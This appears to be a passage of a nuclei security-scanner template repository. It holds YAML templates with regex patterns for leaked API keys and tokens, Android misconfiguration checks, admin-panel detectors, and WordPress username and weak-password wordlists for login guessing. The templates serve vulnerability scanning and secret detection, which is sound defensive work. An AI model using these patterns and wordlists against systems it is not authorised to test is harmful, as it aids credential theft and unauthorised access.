├── .gitignore ├── helpers └── wordlists │ ├── wp-users.txt │ └── wp-passwords.txt ├── file ├── keys │ ├── google-api.yaml │ ├── mailgun-api.yaml │ ├── slack-api.yaml │ ├── pictatic-api-key.yaml │ ├── twilio-api.yaml │ ├── mailchimp-api.yaml │ ├── shopify-token.yaml │ ├── github-personal-token.yaml │ ├── twitter-secret.yaml │ ├── linkedin-id.yaml │ ├── sendgrid-api.yaml │ ├── shopify-shared-secret.yaml │ ├── square-oauth-secret.yaml │ ├── square-access-token.yaml │ ├── stripe-api-key.yaml │ ├── gcp-service-account.yaml │ ├── shopify-custom-token.yaml │ ├── shopify-private-token.yaml │ ├── dynatrace-token.yaml │ ├── facebook-client-id.yaml │ ├── facebook-secret.yaml │ ├── aws-access-id.yaml │ ├── cloudinary.yaml │ ├── credentials.yaml │ ├── paypal-braintree-token.yaml │ ├── firebase-database.yaml │ ├── slack-webhook.yaml │ └── amazon-mws-auth-token.yaml └── android │ ├── file-scheme.yaml │ ├── content-scheme.yaml │ ├── adb-backup-enabled.yaml │ ├── debug-enabled.yaml │ ├── webview-load-url.yaml │ ├── webview-javascript.yaml │ ├── certificate-validation.yaml │ ├── biometric-detect.yaml │ ├── webview-universal-access.yaml │ ├── webview-addjavascript-interface.yaml │ ├── dynamic-broadcast-receiver.yaml │ └── provider-path.yaml ├── .github ├── ISSUE_TEMPLATE │ ├── submit-template.md │ └── feature_request.md └── workflows │ └── syntax-checking.yml ├── .pre-commit-config.yaml ├── workflows ├── jira-workflow.yaml ├── gitlab-workflow.yaml ├── grafana-workflow.yaml ├── lucee-workflow.yaml ├── confluence-workflow.yaml ├── weblogic-workflow.yaml ├── phpmyadmin-workflow.yaml ├── aem-workflow.yaml ├── harbor-workflow.yaml ├── thinkcmf-workflow.yaml ├── cacti-workflow.yaml ├── liferay-workflow.yaml ├── springboot-workflow.yaml ├── bigip-workflow.yaml ├── netsweeper-workflow.yaml ├── samsung-wlan-ap-workflow.yaml ├── rabbitmq-workflow.yaml ├── azkaban-workflow.yaml ├── thinkphp-workflow.yaml ├── wordpress-workflow.yaml ├── artica-web-proxy-workflow.yaml ├── jellyfin-workflow.yaml 
├── micro-focus-workflow.yaml ├── magmi-workflow.yaml ├── cisco-asa-workflow.yaml ├── mida-eframework-workflow.yaml ├── magento-workflow.yaml ├── vbulletin-workflow.yaml ├── cockpit-workflow.yaml └── worksite-takeover-workflow.yaml ├── exposed-panels ├── crxde-lite.yaml ├── jmx-console.yaml ├── solr-exposure.yaml ├── oipm-detect.yaml ├── couchdb-fauxton.yaml ├── flink-exposure.yaml ├── citrix-vpn-detect.yaml ├── cx-cloud-login.yaml ├── hadoop-exposure.yaml ├── kafka-connect-ui.yaml ├── netscaler-gateway.yaml ├── rabbitmq-dashboard.yaml ├── call-break-cms.yaml ├── kafka-topics-ui.yaml ├── kubernetes-dashboard.yaml ├── rocketmq-console-exposure.yaml ├── kronos-workforce-central.yaml ├── zipkin-exposure.yaml ├── kafka-monitoring.yaml ├── mantis-detect.yaml ├── solarwinds-orion.yaml ├── sonarqube-login.yaml ├── aims-password-mgmt-client.yaml ├── sonicwall-sslvpn-panel.yaml ├── supervpn-panel.yaml ├── bazarr-login.yaml ├── compal-panel.yaml ├── saferoads-vms-login.yaml ├── exposed-pagespeed-global-admin.yaml ├── parallels-html-client.yaml ├── manage-engine-admanager-panel.yaml ├── dotcms-admin-panel.yaml ├── druid-console-exposure.yaml ├── github-enterprise-detect.yaml ├── ansible-tower-exposure.yaml ├── exposed-webalizer.yaml ├── phppgadmin-panel.yaml ├── traefik-dashboard.yaml ├── webmin-panel.yaml ├── active-admin-exposure.yaml ├── prometheus-exposed-panel.yaml ├── selenoid-ui-exposure.yaml ├── activemq-panel.yaml ├── atlassian-crowd-panel.yaml ├── checkmarx-panel.yaml ├── hmc-hybris-panel.yaml ├── sonicwall-management-panel.yaml ├── django-admin-panel.yaml ├── jenkins-login.yaml ├── somfy-login.yaml ├── citrix-adc-gateway-detect.yaml ├── fortinet-fortigate-panel.yaml ├── lancom-router-panel.yaml ├── sap-hana-xsengine-panel.yaml ├── ambari-exposure.yaml ├── rstudio-detect.yaml ├── sharecenter-login.yaml ├── xenforo-login.yaml ├── cisco-asa-panel.yaml ├── clave-login-panel.yaml ├── hivemanager-login-panel.yaml ├── netlify-cms.yaml ├── netscalar-aaa-login.yaml ├── 
workspace-one-uem.yaml ├── livezilla-login-panel.yaml ├── strapi-panel.yaml ├── ems-login-panel.yaml ├── securenvoy-panel.yaml ├── yarn-manager-exposure.yaml ├── jfrog.yaml ├── octoprint-login.yaml ├── openerp-database.yaml ├── zenario-login-panel.yaml ├── go-anywhere-client.yaml ├── joomla-panel.yaml ├── powerlogic-ion.yaml ├── sap-netweaver-portal.yaml ├── airflow-panel.yaml ├── glpi-login.yaml ├── sitecore-login-panel.yaml ├── synnefo-admin-panel.yaml ├── virtual-ema-detect.yaml ├── oki-data.yaml ├── plesk-obsidian.yaml ├── plesk-onyx.yaml ├── total-web.yaml ├── web-service-panel.yaml ├── couchdb-exposure.yaml ├── globalprotect-panel.yaml ├── remote-ui-login.yaml ├── vigor-login.yaml ├── blue-iris-login.yaml ├── grafana-detect.yaml ├── weave-scope-dashboard-detect.yaml ├── acunetix-panel.yaml ├── gitlab-detect.yaml ├── r-webserver-login.yaml ├── siteomat-login.yaml ├── web-local-craft.yaml ├── whm-login-detect.yaml ├── xvr-login.yaml └── faraday-login.yaml ├── technologies ├── home-assistant.yaml ├── weblogic-detect.yaml ├── cockpit-detect.yaml ├── maian-cart-detect.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── werkzeug-debugger-detect.yaml ├── shiro-detect.yaml ├── google-storage.yaml ├── default-iis7-page.yaml ├── default-tomcat-page.yaml ├── telerik-fileupload-detect.yaml ├── fanruanoa2012-detect.yaml ├── default-jetty-page.yaml ├── harbor-detect.yaml ├── default-nginx-page.yaml ├── xxljob-admin-detect.yaml ├── itop-detect.yaml ├── node-red-detect.yaml ├── yapi-detect.yaml ├── basic-auth-detection.yaml ├── default-fastcgi-page.yaml ├── default-openresty.yaml ├── firebase-detect.yaml ├── jeedom-detect.yaml ├── sage-detect.yaml ├── default-asp.net-page.yaml ├── default-plesk-page.yaml ├── opencast-detect.yaml ├── airflow-detect.yaml ├── daybyday-detect.yaml ├── teradici-pcoip.yaml ├── dotclear-detect.yaml ├── druid-detect.yaml ├── froxlor-detect.yaml ├── influxdb-detect.yaml ├── oneblog-detect.yaml ├── bigbluebutton-detect.yaml ├── 
crush-ftp-detect.yaml ├── default-windows-server-page.yaml ├── voipmonitor-detect.yaml ├── artica-web-proxy-detect.yaml ├── fanruanoa-detect.yaml ├── herokuapp-detect.yaml ├── jaspersoft-detect.yaml ├── jitsi-meet.yaml ├── magmi-detect.yaml ├── thinkcmf-detection.yaml ├── bedita-detect.yaml ├── default-fedora-page.yaml ├── default-payara-server-page.yaml ├── gespage-detect.yaml ├── strapi-cms-detect.yaml ├── centreon-detect.yaml └── default-apache2-ubuntu-page.yaml ├── .yamllint ├── exposures ├── tokens │ ├── picatic │ │ └── picatic-api-key.yaml │ ├── bitly │ │ └── bitly-secret-key.yaml │ ├── newrelic │ │ ├── newrelic-admin-api-key.yaml │ │ ├── newrelic-rest-api-key.yaml │ │ ├── newrelic-insights-key.yaml │ │ └── newrelic-synthetics-location-key.yaml │ ├── slack │ │ ├── slack-user-token.yaml │ │ ├── slack-bot-token.yaml │ │ └── slack-webhook-token.yaml │ ├── stripe │ │ ├── stripe-secret-key.yaml │ │ └── stripe-restricted-key.yaml │ ├── google │ │ ├── oauth-access-key.yaml │ │ ├── google-api-key.yaml │ │ ├── fcm-server-key.yaml │ │ └── google-calendar-link.yaml │ ├── sendgrid │ │ └── sendgrid-api-key.yaml │ ├── generic │ │ ├── jwt-token.yaml │ │ ├── jdbc-connection-string.yaml │ │ └── shoppable-token.yaml │ ├── sonarqube │ │ └── sonarqube-token.yaml │ ├── amazon │ │ ├── amazon-sns-topic.yaml │ │ ├── aws-access-key-value.yaml │ │ └── amazon-mws-auth-token.yaml │ ├── artifactory │ │ ├── artifactory-api-token.yaml │ │ └── artifactory-api-password.yaml │ ├── discord │ │ └── discord-webhook.yaml │ ├── zoho │ │ └── zoho-webhook-token.yaml │ ├── mailchimp │ │ └── mailchimp-api-key.yaml │ ├── paypal │ │ └── braintree-access-token.yaml │ ├── zapier │ │ └── zapier-webhook-token.yaml │ ├── cloudinary │ │ └── cloudinary-credentials.yaml │ └── microsoft │ │ └── microsoft-teams-webhook.yaml ├── apis │ ├── wsdl-api.yaml │ └── strapi-page.yaml ├── configs │ ├── perl-status.yaml │ ├── ansible-config-disclosure.yaml │ ├── airflow-configuration-exposure.yaml │ ├── 
symfony-profiler.yaml │ ├── amazon-docker-config-disclosure.yaml │ ├── exposed-hg.yaml │ ├── xprober-service.yaml │ ├── exposed-vscode.yaml │ ├── web-config.yaml │ ├── httpd-config.yaml │ └── samba-config.yaml ├── logs │ ├── struts-debug-mode.yaml │ ├── elmah-log-file.yaml │ ├── rails-debug-mode.yaml │ └── npm-log-file.yaml └── files │ ├── drupal-install.yaml │ ├── lazy-file.yaml │ ├── phpunit.yaml │ └── keycloak-json.yaml ├── vulnerabilities ├── wordpress │ ├── wp-xmlrpc.yaml │ └── wp-license-file.yaml ├── vmware │ └── vmware-vcenter-lfi-linux.yaml ├── jira │ ├── jira-unauthenticated-user-picker.yaml │ └── jira-unauthenticated-projects.yaml ├── other │ ├── myucms-lfr.yaml │ ├── aspnuke-openredirect.yaml │ ├── 74cms-sqli.yaml │ └── rce-shellshock-user-agent.yaml └── jenkins │ └── unaunthenticated-jenkin.yaml ├── dns ├── servfail-refused-hosts.yaml └── worksites-detection.yaml ├── network ├── smtp-detection.yaml ├── memcached-stats.yaml ├── sap-router.yaml ├── expn-mail-detect.yaml ├── java-rmi-detect.yaml ├── starttls-mail-detect.yaml ├── unauth-ftp.yaml ├── exposed-zookeeper.yaml ├── printers-info-leak.yaml ├── ftp-default-credentials.yaml └── vnc-detect.yaml ├── takeovers ├── urge-takeover.yaml ├── kinsta-takeover.yaml ├── jazzhr-takeover.yaml ├── mashery-takeover.yaml ├── readme-takeover.yaml ├── smugmug-takeover.yaml ├── surveygizmo-takeover.yaml ├── tave-takeover.yaml ├── hatenablog-takeover.yaml ├── zendesk-takeover.yaml ├── feedpress-takeover.yaml ├── gemfury-takeover.yaml ├── jetbrains-takeover.yaml ├── readthedocs-takeover.yaml ├── teamwork-takeover.yaml ├── agilecrm-takeover.yaml ├── aha-takeover.yaml ├── vend-takeover.yaml ├── helpjuice-takeover.yaml ├── wishpond-takeover.yaml ├── bigcartel-takeover.yaml ├── helpscout-takeover.yaml ├── airee-takeover.yaml ├── ngrok-takeover.yaml ├── brightcove-takeover.yaml ├── pantheon-takeover.yaml ├── uberflip-takeover.yaml ├── anima-takeover.yaml ├── simplebooklet-takeover.yaml ├── getresponse-takeover.yaml ├── 
webflow-takeover.yaml ├── wufoo-takeover.yaml ├── aftership-takeover.yaml ├── hubspot-takeover.yaml ├── proposify-takeover.yaml ├── frontify-takeover.yaml ├── launchrock-takeover.yaml ├── pingdom-takeover.yaml ├── worksites-takeover.yaml ├── cargocollective-takeover.yaml ├── canny-takeover.yaml ├── cargo-takeover.yaml ├── helprace-takeover.yaml ├── heroku-takeover.yaml ├── github-takeover.yaml ├── tumblr-takeover.yaml └── tictail-takeover.yaml ├── misconfiguration ├── jkstatus-manager.yaml ├── phpmyadmin-setup.yaml ├── cx-cloud-upload-detect.yaml ├── exposed-kafdrop.yaml ├── nginx │ └── nginx-status.yaml ├── laravel-debug-error.yaml ├── druid-monitor.yaml ├── rack-mini-profiler.yaml ├── elasticsearch.yaml ├── apc-info.yaml ├── tcpconfig.yaml └── cgi-test-page.yaml ├── cves ├── 2018 │ ├── CVE-2018-13379.yaml │ ├── CVE-2018-7251.yaml │ ├── CVE-2018-14728.yaml │ ├── CVE-2018-16341.yaml │ └── CVE-2018-7490.yaml └── 2020 │ └── CVE-2020-13927.yaml ├── miscellaneous ├── detect-options-method.yaml ├── dir-listing.yaml ├── display-via-header.yaml ├── email-extractor.yaml ├── addeventlistener-detect.yaml └── xml-schema-detect.yaml ├── iot ├── network-camera-detect.yaml ├── contacam.yaml ├── mobotix-guest-camera.yaml ├── epmp-login.yaml ├── internet-service.yaml ├── hp-laserjet-detect.yaml └── liveview-axis-camera.yaml └── .nuclei-ignore /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | .DS_Store 3 | local/ 4 | .checksum 5 | .new-additions -------------------------------------------------------------------------------- /helpers/wordlists/wp-users.txt: -------------------------------------------------------------------------------- 1 | adm 2 | admin 3 | user 4 | admin1 5 | hostname 6 | manager 7 | qwerty 8 | root 9 | support 10 | sysadmin 11 | test 12 | -------------------------------------------------------------------------------- /file/keys/google-api.yaml: 
-------------------------------------------------------------------------------- 1 | id: google-api-key 2 | 3 | info: 4 | name: Google API key 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "AIza[0-9A-Za-z\\-_]{35}" -------------------------------------------------------------------------------- /file/keys/mailgun-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailgun-api-key 2 | 3 | info: 4 | name: Mailgun API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "key-[0-9a-zA-Z]{32}" -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/submit-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Submit Template 3 | about: Submit nuclei template using issue 4 | title: "[nuclei-template] template-name" 5 | labels: 'nuclei-template' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Template Details** 11 | 12 | ```yaml 13 | 14 | nuclei template goes here 15 | ``` 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /file/android/file-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: file-scheme 2 | 3 | info: 4 | name: File Scheme Enabled 5 | author: gaurang 6 | 
severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"file\"" -------------------------------------------------------------------------------- /file/keys/slack-api.yaml: -------------------------------------------------------------------------------- 1 | id: slack-api 2 | 3 | info: 4 | name: Slack API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?" -------------------------------------------------------------------------------- /file/keys/pictatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: pictatic-api-key 2 | 3 | info: 4 | name: Pictatic API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sk_live_[0-9a-z]{32}" -------------------------------------------------------------------------------- /file/keys/twilio-api.yaml: -------------------------------------------------------------------------------- 1 | id: twilio-api 2 | 3 | info: 4 | name: Twilio API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" -------------------------------------------------------------------------------- /file/keys/mailchimp-api.yaml: -------------------------------------------------------------------------------- 1 | id: mailchimp-api-key 2 | 3 | info: 4 | name: Mailchimp API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "[0-9a-f]{32}-us[0-9]{1,2}" 
-------------------------------------------------------------------------------- /file/keys/shopify-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-access-token 2 | 3 | info: 4 | name: Shopify Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpat_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /helpers/wordlists/wp-passwords.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | password 4 | 12345678 5 | 666666 6 | 111111 7 | 1234567 8 | qwerty 9 | siteadmin 10 | administrator 11 | root 12 | 123123 13 | 123321 14 | 1234567890 15 | letmein123 16 | test123 17 | demo123 18 | pass123 19 | 123qwe 20 | qwe123 21 | 654321 22 | loveyou 23 | adminadmin123 24 | -------------------------------------------------------------------------------- /file/android/content-scheme.yaml: -------------------------------------------------------------------------------- 1 | id: content-scheme 2 | 3 | info: 4 | name: Content Scheme Enabled 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - xml 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:scheme=\"content\"" -------------------------------------------------------------------------------- /file/keys/github-personal-token.yaml: -------------------------------------------------------------------------------- 1 | id: github-personal-token 2 | 3 | info: 4 | name: Github Personal Token 5 | author: geeknik 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "ghp_.{36}" 17 | -------------------------------------------------------------------------------- /file/keys/twitter-secret.yaml: 
-------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret 5 | author: gaurang 6 | severity: medium 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" -------------------------------------------------------------------------------- /workflows/jira-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: jira-workflow 2 | 3 | info: 4 | name: Jira Security Checks 5 | author: micha3lb3n 6 | description: A simple workflow that runs all Jira related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/jira-detect.yaml 10 | subtemplates: 11 | - tags: jira -------------------------------------------------------------------------------- /file/android/adb-backup-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: adb-backup-enabled 2 | 3 | info: 4 | name: ADB Backup Enabled 5 | author: gaurang 6 | severity: low 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "android:allowBackup=\"true\"" -------------------------------------------------------------------------------- /file/android/debug-enabled.yaml: -------------------------------------------------------------------------------- 1 | id: android-debug-enabled 2 | 3 | info: 4 | name: Android Debug Enabled 5 | author: gaurang 6 | severity: low 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: regex 15 | regex: 16 | - "android:debuggable=\"true\"" -------------------------------------------------------------------------------- /file/keys/linkedin-id.yaml: -------------------------------------------------------------------------------- 1 | id: linkedin-client-id 2 | 3 | info: 4 | 
name: Linkedin Client ID 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)linkedin(.{0,20})?(?-i)[0-9a-z]{12}" -------------------------------------------------------------------------------- /file/keys/sendgrid-api.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key 2 | 3 | info: 4 | name: Sendgrid API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" -------------------------------------------------------------------------------- /file/keys/shopify-shared-secret.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-shared-secret 2 | 3 | info: 4 | name: Shopify Shared Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shpss_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /file/keys/square-oauth-secret.yaml: -------------------------------------------------------------------------------- 1 | id: square-oauth-secret 2 | 3 | info: 4 | name: Square OAuth Secret 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sq0csp-[0-9A-Za-z\\-_]{43}" -------------------------------------------------------------------------------- /workflows/gitlab-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: gitlab-workflow 2 | 3 | info: 4 | name: GitLab Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all GitLab related nuclei templates on a given 
target. 7 | 8 | workflows: 9 | - template: exposed-panels/gitlab-detect.yaml 10 | subtemplates: 11 | - tags: gitlab -------------------------------------------------------------------------------- /file/keys/square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 17 | -------------------------------------------------------------------------------- /file/keys/stripe-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-api-key 2 | 3 | info: 4 | name: Stripe API Key 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" -------------------------------------------------------------------------------- /file/keys/gcp-service-account.yaml: -------------------------------------------------------------------------------- 1 | id: gcp-service-account 2 | 3 | info: 4 | name: Google (GCP) Service-account 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "\"type\": \"service_account\"" -------------------------------------------------------------------------------- /file/keys/shopify-custom-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-custom-token 2 | 3 | info: 4 | name: Shopify Custom App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - 
"shpca_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /file/keys/shopify-private-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-private-token 2 | 3 | info: 4 | name: Shopify Private App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "shppa_[a-fA-F0-9]{32}" -------------------------------------------------------------------------------- /exposed-panels/crxde-lite.yaml: -------------------------------------------------------------------------------- 1 | id: crxde-lite 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/crx/de/index.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "CRXDE Lite" 17 | -------------------------------------------------------------------------------- /exposed-panels/jmx-console.yaml: -------------------------------------------------------------------------------- 1 | id: jmx-console 2 | info: 3 | name: JMX Console 4 | author: yashanand155 5 | severity: low 6 | tags: panel,jmx 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jmx-console/' 12 | matchers: 13 | - type: word 14 | words: 15 | - JBoss JMX Management Console 16 | -------------------------------------------------------------------------------- /exposed-panels/solr-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: solr-exposure 2 | 3 | info: 4 | name: Apache Solr Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/solr/' 13 | matchers: 14 | - type: word 15 | words: 16 | - "Solr Admin" -------------------------------------------------------------------------------- 
/file/keys/dynatrace-token.yaml: -------------------------------------------------------------------------------- 1 | id: dynatrace-token 2 | 3 | info: 4 | name: Dynatrace Token 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" -------------------------------------------------------------------------------- /workflows/grafana-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-workflow 2 | 3 | info: 4 | name: Grafana Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all Grafana related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/grafana-detect.yaml 10 | subtemplates: 11 | - tags: grafana 12 | -------------------------------------------------------------------------------- /workflows/lucee-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: lucee-workflow 2 | 3 | info: 4 | name: Lucee Detection Workflow 5 | author: geeknik,dhiyaneshDk 6 | description: A simple workflow that runs all Lucee related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/lucee-detect.yaml 10 | subtemplates: 11 | - tags: lucee 12 | -------------------------------------------------------------------------------- /file/keys/facebook-client-id.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-client-id 2 | 3 | info: 4 | name: Facebook Client ID 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?['\"][0-9]{13,17}['\"]" -------------------------------------------------------------------------------- /file/keys/facebook-secret.yaml: -------------------------------------------------------------------------------- 1 | id: facebook-secret-key 2 | 3 | info: 4 | name: Facebook Secret Key 5 | author: gaurang 6 | severity: low 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "(?i)(facebook|fb)(.{0,20})?(?-i)['\"][0-9a-f]{32}['\"]" -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: info 7 | tags: tech,iot 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /workflows/confluence-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: confluence-workflow 2 | 3 | info: 4 | name: Atlassian Confluence workflow 5 | author: philippedelteil 6 | description: Workflow that runs all Confluence related nuclei templates 7 | 8 | workflows: 9 | 10 | - template: 
technologies/confluence-detect.yaml 11 | subtemplates: 12 | - tags: confluence 13 | -------------------------------------------------------------------------------- /workflows/weblogic-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: weblogic-workflow 2 | info: 3 | name: WebLogic Security Checks 4 | author: dr_set 5 | description: A simple workflow that runs all WebLogic related nuclei templates on a given target. 6 | 7 | workflows: 8 | - template: technologies/weblogic-detect.yaml 9 | 10 | subtemplates: 11 | - tags: weblogic -------------------------------------------------------------------------------- /exposed-panels/oipm-detect.yaml: -------------------------------------------------------------------------------- 1 | id: oipm-detect 2 | info: 3 | name: One Identity Password Manager detection 4 | author: nodauf 5 | severity: info 6 | tags: panel 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/PMUser/' 12 | matchers: 13 | - type: word 14 | words: 15 | - "One Identity Password Manager" -------------------------------------------------------------------------------- /file/android/webview-load-url.yaml: -------------------------------------------------------------------------------- 1 | id: webview-load-url 2 | 3 | info: 4 | name: Webview loadUrl usage 5 | author: gaurang 6 | severity: info 7 | tags: android,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | matchers: 14 | - type: word 15 | words: 16 | - "Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V" -------------------------------------------------------------------------------- /file/keys/aws-access-id.yaml: -------------------------------------------------------------------------------- 1 | id: aws-access-key 2 | 3 | info: 4 | name: AWS Access Key ID 5 | author: gaurang 6 | severity: info 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - 
"(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" 17 | -------------------------------------------------------------------------------- /file/keys/cloudinary.yaml: -------------------------------------------------------------------------------- 1 | id: cloudinary-basic-auth 2 | 3 | info: 4 | name: Cloudinary Basic Auth 5 | author: gaurang 6 | severity: high 7 | tags: token,file 8 | 9 | file: 10 | - extensions: 11 | - all 12 | 13 | extractors: 14 | - type: regex 15 | regex: 16 | - "cloudinary://[0-9]{15}:[0-9A-Za-z\\-_]+@[0-9A-Za-z\\-_]+" -------------------------------------------------------------------------------- /workflows/phpmyadmin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-workflow 2 | 3 | info: 4 | name: phpmyadmin-workflow 5 | author: philippedelteil 6 | description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target 7 | 8 | workflows: 9 | - template: exposed-panels/phpmyadmin-panel.yaml 10 | subtemplates: 